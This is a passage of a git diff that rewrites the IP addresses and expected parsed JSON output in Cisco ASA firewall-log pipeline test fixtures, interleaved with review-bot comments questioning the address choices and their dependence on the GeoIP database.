 "172.31.98.44"
 ]
 },
@@ -20340,8 +20340,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112097305Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364663800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20377,8 +20377,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20412,7 +20412,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20421,8 +20421,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112098975Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364667900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20458,8 +20458,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20493,7 +20493,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20502,8 +20502,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112100697Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364672Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20539,8 +20539,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20574,7 +20574,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20583,8 +20583,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112102392Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364675700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20620,8 +20620,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20655,7 +20655,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20664,8 +20664,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112104035Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364680200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20701,8 +20701,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20736,7 +20736,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20745,8 +20745,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112105681Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364684400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20782,8 +20782,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20817,7 +20817,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20826,8 +20826,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112107320Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364688500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20863,8 +20863,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20898,7 +20898,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20907,8 +20907,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112108998Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364692900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log
index a02a1136b19..7b4ae13e9de 100644
--- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log
+++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log
@@ -1 +1 @@
-Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 1.2.3.4, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2
+Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 81.2.69.144, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2
diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log-expected.json
index f436174538b..f38b44ec55f 100644
--- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log-expected.json
+++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log-expected.json
@@ -7,18 +7,24 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "RU-MOW",
- "city_name": "Moscow",
- "country_iso_code": "RU",
- "country_name": "Russia",
- "region_name": "Moscow",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 37.6172,
- "lat": 55.7527
+ "lon": -1.3614,
+ "lat": 51.7095
 }
 },
- "address": "1.2.3.4",
- "ip": "1.2.3.4"
+ "as": {
+ "number": 20712,
+ "organization": {
+ "name": "Andrews \u0026 Arnold Ltd"
+ }
+ },
+ "address": "81.2.69.144",
+ "ip": "81.2.69.144"
 },
 "tags": [
 "preserve_original_event"
@@ -34,13 +40,13 @@
 },
 "related": {
 "ip": [
- "1.2.3.4"
+ "81.2.69.144"
 ]
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:19.139615469Z",
- "original": "Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 1.2.3.4, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2",
+ "ingested": "2021-12-09T13:32:10.434308700Z",
+ "original": "Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 81.2.69.144, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2",
 "code": "734001",
 "kind": "event",
 "action": "firewall-rule",
diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-filtered.log-expected.json
index 32f71f62761..70db62062e6 100644
--- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-filtered.log-expected.json
+++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-filtered.log-expected.json
@@ -31,7 +31,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-07-19T09:06:19.206386917Z",
+ "ingested": "2021-12-09T13:32:10.616159800Z",
 "original": "Jan 1 01:00:27 beats asa[1234]: %ASA-7-999999: This message is not filtered.",
 "code": "999999",
 "kind": "event",
@@ -72,7 +72,7 @@
 },
 "event": {
 "severity": 8,
- "ingested": "2021-07-19T09:06:19.206392337Z",
+ "ingested": "2021-12-09T13:32:10.616169400Z",
 "original": "Jan 1 01:00:30 beats asa[1234]: %ASA-8-999999: This phony message is dropped due to log level.",
 "code": "999999",
 "kind": "event",
@@ -146,7 +146,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-07-19T09:06:19.206394377Z",
+ "ingested": "2021-12-09T13:32:10.616194900Z",
 "original": "Jan 1 01:02:12 beats asa[1234]: %ASA-2-106001: Inbound TCP connection denied from 10.13.12.11/45321 to 192.168.33.12/443 flags URG+SYN+RST on interface eth0",
 "code": "106001",
 "kind": "event",
diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log
index 531c241da79..c51bd423da3 100644
--- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log
+++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log
@@ -1,2 +1,2 @@
 Oct 10 2019 10:21:36 localhost: %ASA-6-302021: Teardown ICMP connection for faddr target.destination.hostname.local/10005 gaddr 10.0.55.66/0 laddr Prod-host.name.addr/0
-Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.0.2.15/0 gaddr 192.0.2.134/57808 laddr 192.0.2.134/57808 type 8 code 0
+Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.15/0 gaddr 192.168.2.134/57808 laddr 192.168.2.134/57808 type 8 code 0
diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log-expected.json
index 891f15c8b92..299a4b82c18 100644
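Review bot: The second line of test-hostnames.log swaps RFC 5737 documentation addresses (192.0.2.15, 192.0.2.134) for RFC 1918 private ones, which is a wider change than this fixture needs: the file exercises hostname-versus-IP parsing, and the matching expected output shows `destination` and `source` holding only `address`/`ip` with no geo fields before or after the change, so the documentation range was already enrichment-free. Keeping 192.0.2.x would have left `faddr`/`gaddr` in the conventional non-routable public range; if the pipeline ever classifies private versus public addresses (for example to derive network.direction), the 192.168.2.x values will exercise a different case than the original line did. If the move to private space is deliberate because only a fixed set of public addresses is covered by the GeoIP database used in pipeline tests, a one-line rationale in the PR description would stop a later maintainer from reverting it.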
--- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log-expected.json
+++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log-expected.json
@@ -45,7 +45,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:19.346120522Z",
+ "ingested": "2021-12-09T13:32:10.900273500Z",
 "original": "Oct 10 2019 10:21:36 localhost: %ASA-6-302021: Teardown ICMP connection for faddr target.destination.hostname.local/10005 gaddr 10.0.55.66/0 laddr Prod-host.name.addr/0",
 "code": "302021",
 "kind": "event",
@@ -69,12 +69,12 @@
 "level": "informational"
 },
 "destination": {
- "address": "192.0.2.15",
- "ip": "192.0.2.15"
+ "address": "192.168.2.15",
+ "ip": "192.168.2.15"
 },
 "source": {
- "address": "192.0.2.134",
- "ip": "192.0.2.134"
+ "address": "192.168.2.134",
+ "ip": "192.168.2.134"
 },
 "tags": [
 "preserve_original_event"
@@ -98,8 +98,8 @@
 "MYHOSTNAME"
 ],
 "ip": [
- "192.0.2.134",
- "192.0.2.15"
+ "192.168.2.134",
+ "192.168.2.15"
 ]
 },
 "host": {
@@ -107,8 +107,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:19.346126402Z",
- "original": "Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.0.2.15/0 gaddr 192.0.2.134/57808 laddr 192.0.2.134/57808 type 8 code 0",
+ "ingested": "2021-12-09T13:32:10.900281300Z",
+ "original": "Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.15/0 gaddr 192.168.2.134/57808 laddr 192.168.2.134/57808 type 8 code 0",
 "code": "302021",
 "kind": "event",
 "action": "flow-expiration",
@@ -122,7 +122,7 @@
 },
 "cisco": {
 "asa": {
- "mapped_source_ip": "192.0.2.134",
+ "mapped_source_ip": "192.168.2.134",
 "icmp_type": 8,
 "icmp_code": 0
 }
diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log
index 2742be4b533..ca647162cfc 100644
--- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log
+++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log
@@ -1,3 +1,3 @@
-<165>Oct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.0.2.244(27218) -> OUTSIDE/203.0.113.42(53) hit-cnt 1 first hit [0x16847359, 0x00000000]
+<165>Oct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -> OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]
 Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233
 Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware
diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log-expected.json
index 3ae6102b703..2eda35d4c50 100644
--- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log-expected.json
+++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log-expected.json
@@ -5,9 +5,27 @@
 "level": "notification"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
+ "location": {
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
+ },
+ "as": {
+ "number": 20712,
+ "organization": {
+ "name": "Andrews \u0026 Arnold Ltd"
+ }
+ },
+ "address": "81.2.69.144",
 "port": 53,
- "address": "203.0.113.42",
- "ip": "203.0.113.42"
+ "ip": "81.2.69.144"
 },
 "syslog": {
 "facility": {
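Review bot: The `WHAT-IS-THIS-A-HOSTNAME-192.0.2.244` token in test-not-ip.log did not need to change: the expected output for this event keeps it as `source.domain` rather than `source.ip`, so the digits embedded in it are never treated as an address, and rewriting them to 192.168.2.244 only widens the diff without altering what the test proves. The new destination 81.2.69.144 is, by contrast, a live allocated public address that the expected output now resolves to a full geo and AS record, so this fixture has become an assertion on the GeoIP database used by the pipeline test runner as well as a not-an-IP parsing test; if that coupling is intended, the fixed set of addresses that database covers is worth naming in the PR description, and if it is not, an RFC 1918 destination would keep this event enrichment-free as 203.0.113.42 was. The same database dependency applies to the test-dap-records.log hunk above, whose expected output gains the identical Abingdon/AS 20712 record.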
@@ -16,8 +34,8 @@
 },
 "source": {
 "port": 27218,
- "address": "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244",
- "domain": "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244"
+ "address": "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244",
+ "domain": "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244"
 },
 "tags": [
 "preserve_original_event"
@@ -47,16 +65,16 @@
 },
 "related": {
 "hosts": [
- "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244"
+ "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244"
 ],
 "ip": [
- "203.0.113.42"
+ "81.2.69.144"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-07-19T09:06:19.451996709Z",
- "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.0.2.244(27218) -\u003e OUTSIDE/203.0.113.42(53) hit-cnt 1 first hit [0x16847359, 0x00000000]",
+ "ingested": "2021-12-09T13:32:11.119441600Z",
+ "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -\u003e OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]",
 "code": "106100",
 "kind": "event",
 "action": "firewall-rule",
@@ -120,7 +138,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:19.452002310Z",
+ "ingested": "2021-12-09T13:32:11.119449700Z",
 "original": "Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233",
 "code": "302021",
 "kind": "event",
@@ -202,7 +220,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:19.452004366Z",
+ "ingested": "2021-12-09T13:32:11.119455300Z",
 "original": "Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware",
 "code": "338204",
 "kind": "event",
diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log
index 73ea89341b0..5dc7589b754 100644
--- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log
+++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log
@@ -1,72 +1,72 @@ -Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 by access-group "acl_dmz" [0xe3aab522, 0x0] -Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 type 3, code 0, by access-group "acl_dmz" [0xe3aab522, 0x0] -Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -> outside/192.0.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0] -Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -> outside/192.0.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0] -Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.0.2.130/12834 -Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.0.2.43/443 (192.0.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834) -Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.0.2.130/25882 -Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.0.2.222/53 (192.0.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882) -Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.0.2.130/45392 -Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.0.2.1/80 (192.0.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392) -Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.0.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140 -Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 666 for outside:192.0.2.222/53 user1 to 
inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999 +Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group "acl_dmz" [0xe3aab522, 0x0] +Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group "acl_dmz" [0xe3aab522, 0x0] +Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -> outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0] +Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -> outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0] +Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834 +Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834) +Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882 +Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882) +Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392 +Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392) +Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140 +Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP 
connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999 Jun 04 2011 21:59:52 FJSG2NRFW01 : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233 -Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.0.0.130/10879 -Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.0.0.17/80 (192.0.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879) -Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.0.0.66/12981 to 10.1.2.60/53 due to DNS Query -Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 29 2013 12:59:50: 
%ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879 +Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879) +Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query +Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 